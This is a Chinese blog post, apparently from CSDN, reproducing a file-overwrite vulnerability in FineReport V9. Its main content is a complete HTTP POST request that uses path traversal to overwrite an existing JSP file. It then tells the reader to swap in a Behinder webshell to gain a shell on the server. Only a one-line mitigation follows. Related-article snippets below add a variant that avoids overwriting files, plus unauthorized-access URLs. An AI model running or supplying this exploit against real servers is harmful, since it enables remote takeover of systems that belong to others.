帆软 V9 Getshell 漏洞

最新推荐文章于 2024-06-25 21:00:00 发布
最新推荐文章于 2024-06-25 21:00:00 发布
阅读量5.5k 收藏 3
点赞数
分类专栏: 漏洞复现 文章标签: 安全 web安全 帆软报表 帆软 finereport
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/jd_cx/article/details/125672177
版权

0x00 任意文件上传漏洞【FineReport V9

 

0x01 漏洞描述

此漏洞是任意文件覆盖,上传 JSP 马,需要找已存在的 JSP 文件进行覆盖,寻找Tomcat 启动帆软后默认存在的 JSP 文件

0x02 漏洞详情

POST /WebReport/ReportServer?op=svginit&cmd=design_save_svg&filePath=chartmapsvg/../../../../WebReport/update.jsp  HTTP/1.1
Host: x.x.x.x
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=DE7874FC92F0852C84D38935247D947F; JSESSIONID=A240C26B17628D871BB74B7601482FDE
Connection: close
Content-Type:text/xml;charset=UTF-8

Content-Length: 74

{"__CONTENT__":"<%out.println(\"Hello World!\");%>","__CHARSET__":"UTF-8"}

 

 payload 替换成冰蝎的马,即可getshell

0x03  临时修复建议

排查是否使用帆软系统,并同步在AF自定义禁止访问webroot/ReportServer路径。

 

Sword-heart
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
帆软FineReport) V9任意文件覆盖漏洞
江左盟的博客
05-03 2万+
目录 漏洞简介 影响范围 漏洞分析 漏洞利用 修复方法 批量漏洞检测工具 漏洞简介 该漏洞是在近期HVV中被披露的,由于在初始化svg文件时,未对传入的参数做限制,导致可以对已存在的文件覆盖写入数据,从而通过将木马写入jsp文件中获取服务器权限。 影响范围 WebReport V9 漏洞分析 fr-chart-9.0.jar包中com.fr.chart.web/ChartSvgInitService类传递op参数的值svginit: 漏洞主要出现在fr-chart-9.0.
solly0880#wiki#帆软 V9 任意文件覆盖文件上传1
07-25
帆软 V9 任意文件覆盖文件上传漏洞描述帆软 V9 存在任意文件覆盖导致攻击者可以任意文件上传漏洞影响帆软 V9漏洞复现。
致远OA敏感信息泄露漏洞合集(含批量检测POC)
最新发布
Karka_的博客
06-25 2257
用友致远OA协同管理软件为企事业组织提供了一个协同办公门户和管理平台,涵盖了组织运营涉及的协作管理、审批管理、资源管理、知识管理、文化管理、公文管理等内容,支持企事业组织的信息化扩展应用,能有效帮助组织解决战略落地、文化建设、规范管理、资源整合、运营管控等难题,是组织管理的最佳实践。产品系列: A3、A6、A8品牌: 用友对象: 微型、小型企业、企业部门级。
帆软报表漏洞总结
weixin_51345872的博客
09-05 8791
仅供学习参考使用,任何违法事情与本人无关
帆软 FineReport/FineBI channel反序列化漏洞分析
热门推荐
errorr0
07-18 1万+
漏洞分析
帆软V9任意文件覆盖漏洞+无损上传
网络安全。
01-15 1612
由于WebReport V9在安装之后在WebReport目录下存在update.jsp和update1.jsp,因此可以构造payload直接覆盖这两个文件的内容,从而GetShell。要由chartmapsvg开头,包含.svg时会先创建文件,然后再到后续逻辑,所以只需要xxx.svg.jsp这种格式,不需要覆盖原有文件即可无损利用成功。上传其他 webshell 同理,建议哥斯拉、冰蝎等等。注意:木马的双引号要转义一下。
帆软报表 V8.0 组合拳漏洞分析及复现
2301_80115097的博客
12-15 3044
FineReport是一款企业级报表设计和数据可视化软件,纯Java编写的企业级web报表工具。它提供了强大的报表设计、数据分析和数据可视化功能,旨在帮助企业用户轻松地创建高质量的报表和数据分析图表。
帆软V9getshell1
08-03
这一漏洞被命名为“帆软V9getshell1”。 #### 二、漏洞原理 ##### 2.1 任意文件覆盖机制 任意文件覆盖是指攻击者能够替换或修改服务器上的现有文件。在帆软报表系统的实现中,存在一处逻辑缺陷使得攻击者可以利用...
Thinkergod#PeiQi-WIKI-POC#帆软 V9 任意文件覆盖文件上传1
07-25
帆软 V9 任意文件覆盖文件上传漏洞描述帆软 V9 存在任意文件覆盖导致攻击者可以任意文件上传漏洞影响帆软 V9漏洞复现。
PHPCMS V9专题模块注入漏洞的分析与修复方法
09-29
漏洞的核心在于对`$_GET['typeid']`参数的处理不当。在第56行代码中,`typeid`被转换为了整型,但是在第66行再次使用时,却没有使用之前转换后的整型值。这意味着,即使`typeid`参数已经被转换过一次,但其后续使用...
v9 get标签的BUG
09-16
v9 get标签的BUG,使用PHPCMS v9使用get标签要注意的问题
2021hvv--帆软上传漏洞
qq_52612931的博客
08-12 1905
帆软漏洞
帆软报表 V8 get_geo_json 任意文件读取漏洞
huangyongkang666的博客
01-25 6534
帆软报表 V8 get_geo_json 任意文件读取漏洞 CNVD-2018-04757
帆软报表 channel 反序列化漏洞复现
0xSec
11-27 5427
帆软FineReportFineBI 存在反序列化漏洞,攻击者可向 /webroot/decision/remote/design/channel 接口发送精心构造的反序列化数据,在目标服务器上执行任意代码,获取服务器权限。
FineReport帆软)报表系统目录遍历漏洞复现和用简易过滤器处理
qq_34078582的博客
12-28 1万+
1.复现: 1.1直接通过浏览器访问以下地址 http://localhost:8080/WebReport/ReportServer?op=fs_remote_design&cmd=design_list_file&file_path=..&currentUserName=admin&currentUserId=1&isWebReport=true ...
帆软 FineReport之channel反序列化漏洞复现的简单记录(不含EXP)
lostnerv的专栏
08-25 4191
FineReport 的包和BI不一样,无法原样照搬,最后还是自己找到了个利用链,可以实现任意文件上传,不知道有没有可以直接RCE的大佬,可以传授我下~~。
记一次曲折的后台getshell过程
zhangge3663的博客
01-05 481
最近团队在对某个厂商进行测试,辛辛苦苦搞了快一个星期才拿到一个 shell,弟弟太惨了 0x01 开始复现 访问url进入登录界面,输入管理密码进入页面 请装作没有看到我那个失败的XSS,过了这么久也忘记了在哪里改回来了 进入页面 我这咋一看,我丢这不是和通某OA差不多吗,当初通某OA刚发的时候,全是XSS,越权,SQL注入,未授权啥的,那时候也是更上了那次风,小赚了一笔 好了,不扯皮了,正式开始复现,进入页面后,点击数据准备 添加一个业务包,点击进去后发现可以添加数据表
帆软数据决策系统漏洞_帆软报表漏洞总结
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
09-24 3415
一、帆软数据决策系统漏洞背景,FineReport报表软件是帆软软件(中国)公司自主研发的一款纯Java编写的企业级web报表软件。主要针对2012年7.0版本存在一些安全漏洞问题。 二、帆软数据决策系统漏洞版本查看弱口令漏洞提供了访问此页面方法 三、帆软数据决策系统漏洞漏洞总结 1.未授权访问漏洞 http://ip/ReportServer?op=fr_server&cmd=sc_visitstatehtml&showtoolbar=false //未授权访问内网ip的日志 http://ip/Repo
【1day】致远OA帆软组件 ReportServer 目录遍历漏洞学习
记录并分享学习安全的知识点..
09-28 2181
致远OA 帆软组件 ReportServer接口存在目录遍历漏洞,攻击者通过漏洞可以获取服务器敏感信息。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值